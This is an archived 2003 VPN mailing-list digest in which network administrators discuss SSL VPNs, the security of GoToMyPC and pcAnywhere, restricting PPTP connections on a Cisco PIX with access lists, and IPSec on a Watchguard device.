(TSimons at Delphi-Tech.com) Date: Wed, 30 Apr 2003 14:37:47 -0400 Subject: [VPN] SSL VPN Message-ID: <880E60DA7286AB4CBEECB01B169A63BD0379D463@NJ-2K-Email1.delphi-tech.com> Check out "Proxy" by Funk Software (www.funk.com) We utilize this through VPN connections, it works great! The only downfall is it works on UDP traffic, TCP functionality is due in the next few months. ~Todd -----Original Message----- From: Roger Qian [mailto:roger.qian at sholodge.com] Sent: Wednesday, April 30, 2003 11:37 AM To: shannong Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN How is pcANYWHERE? smae as GoToMyPc from a security stand point? Thanks, Roger -----Original Message----- From: shannong [mailto:shannong at texas.net] Sent: Tuesday, April 29, 2003 7:27 PM Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN >From a security stand point, GoToMyPC is a really bad idea. Providing a third-party with unadulterated access to machines on your internal network is not taking your internal security very serious. In addition to giving that provider with access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and it's use as a VPN solution. I am > > aware of some of > > it's limitations but I was wondering has anyone tried this: allowed a SSL > > connection to a web > > server that lets the user to open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via a SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > We had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writer's had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... > > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From cgripp at automotive.com Wed Apr 30 15:37:12 2003 From: cgripp at automotive.com (Chris Gripp) Date: Wed, 30 Apr 2003 12:37:12 -0700 Subject: [VPN] SSL VPN Message-ID: I'd say remote control accessible from the internet without source IP filtering is generally a bad idea regardless of the implementation. Anyone could just sit and bang away at a login prompt. Now, hopefully you are using strong password policies, etc to mitigate the risk but it still doesn't give me a warm and fuzzy feeling knowing anyone could just keep trying till they get bored or succeed. -Chris -----Original Message----- From: Roger Qian [mailto:roger.qian at sholodge.com] Sent: Wednesday, April 30, 2003 8:37 AM To: shannong Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN How is pcANYWHERE? smae as GoToMyPc from a security stand point? Thanks, Roger -----Original Message----- From: shannong [mailto:shannong at texas.net] Sent: Tuesday, April 29, 2003 7:27 PM Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN >From a security stand point, GoToMyPC is a really bad idea. Providing a third-party with unadulterated access to machines on your internal network is not taking your internal security very serious. In addition to giving that provider with access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and it's use as a VPN solution. I am > > aware of some of > > it's limitations but I was wondering has anyone tried this: allowed a SSL > > connection to a web > > server that lets the user to open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via a SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > We had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writer's had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... > > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From shannong at texas.net Wed Apr 30 21:23:10 2003 From: shannong at texas.net (shannong) Date: Wed, 30 Apr 2003 20:23:10 -0500 Subject: [VPN] VPN on Cisco PIX In-Reply-To: <3EB00353.7060705@qwest.com> Message-ID: <005d01c30f80$3b9f44f0$0101a8c0@ASTEROID> The [sysopt connection permit-pptp] affects what things the VPDN client can access after a successful session is established, which means everything. With out that sysopt command, you would need to define what things an VPN client can access with ACLs as the usual rule of deny all would be in effect when accessing higher security interfaces. That sysopt command does not affect what addresses can connect to the Pix for PPTP sessions. Also, ACLs applied to a Pix's interface do not affect traffic destined to the Pix itself, such as establishing a PPTP session. That's why you use the commands icmp, telnet, ssh, etc to affect who/what can talk to the Pix because normal ACLs on interfaces to don't stop/allow that traffic destined to the Pix. Filtering the source address of those terminating VPN tunnels seemed to be the question asked. If that is the question, it cannot be done on the Pix itself. An ACL would need to be created on a device in front of the Pix to limit who could connect to GRE/1723. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Dana J. Dawson Sent: Wednesday, April 30, 2003 12:10 PM To: vpn at lists.shmoo.com Subject: Re: [VPN] VPN on Cisco PIX Actually, you can, but you have to remove the "sysopt connection permit-pptp" command that is usually used. In this case, you have to permit all the incoming traffic to the PIX with an access-list (or conduit, I suppose), including the PPTP traffic (GRE and TCP/1723). Since you're using an access-list to allow that traffic, you can also restrict the source, which is what you want. HTH Dana -- Dana J. Dawson djdawso at qwest.com Senior Staff Engineer CCIE #1937 Qwest Communications (612) 664-3364 600 Stinson Blvd., Suite 1S (612) 664-4779 (FAX) Minneapolis MN 55413-2620 "Hard is where the money is." shannong wrote: > No. VPDN cannot be restricted by IP on the Pix. Instead, you'll need > to use an ACL on the router in front. You can do real VPNs using IPSec > and specify the IPs that can have access by defining their pre-shared > keys for IKE. All others will fail. > > -Shannon > > -----Original Message----- > From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On > Behalf Of silvia ghezzi > Sent: Tuesday, April 29, 2003 2:27 AM > To: vpn at lists.shmoo.com > Subject: [VPN] VPN on Cisco PIX > > Hello, > > I have enabled a PPTP VPN to my CISCO PIX, but I > cannot find the way to filer the public source IP > address to establish VPN with PIX, so at the moment > everybody can create a VPN with us and we don't want > this. > > Is there a way to prevent this? > > Many thanks > Regards > > Silvia _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From shannong at texas.net Wed Apr 30 21:25:14 2003 From: shannong at texas.net (shannong) Date: Wed, 30 Apr 2003 20:25:14 -0500 Subject: [VPN] SSL VPN In-Reply-To: Message-ID: <005e01c30f80$87b5b950$0101a8c0@ASTEROID> Worse. For it to work, you would need to allow access for the entire Internet to establish inbound sessions to the host. At least GoToMyPC doesn't require an open port inbound. The PC establishes the session outbound. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Roger Qian Sent: Wednesday, April 30, 2003 10:37 AM To: shannong Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN How is pcANYWHERE? smae as GoToMyPc from a security stand point? Thanks, Roger -----Original Message----- From: shannong [mailto:shannong at texas.net] Sent: Tuesday, April 29, 2003 7:27 PM Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN >From a security stand point, GoToMyPC is a really bad idea. Providing a third-party with unadulterated access to machines on your internal network is not taking your internal security very serious. In addition to giving that provider with access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and it's use as a VPN solution. I am > > aware of some of > > it's limitations but I was wondering has anyone tried this: allowed a SSL > > connection to a web > > server that lets the user to open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via a SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > We had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writer's had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... > > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From john.spanos at adacel.com Wed Apr 30 21:49:48 2003 From: john.spanos at adacel.com (John Spanos) Date: Thu, 1 May 2003 11:49:48 +1000 Subject: [VPN] Re: Watchguard VClass VPN In-Reply-To: <20030419060148.89613.qmail@web12706.mail.yahoo.com> Message-ID: Hi All, just a quick and easy question. Has anyone implmented an IPSec tunnel on a Watchguard VClass (we are using V80) that terminates on a DMZ interface? Or can anyone confirm that this IS actually possible? Thanks. John Spanos.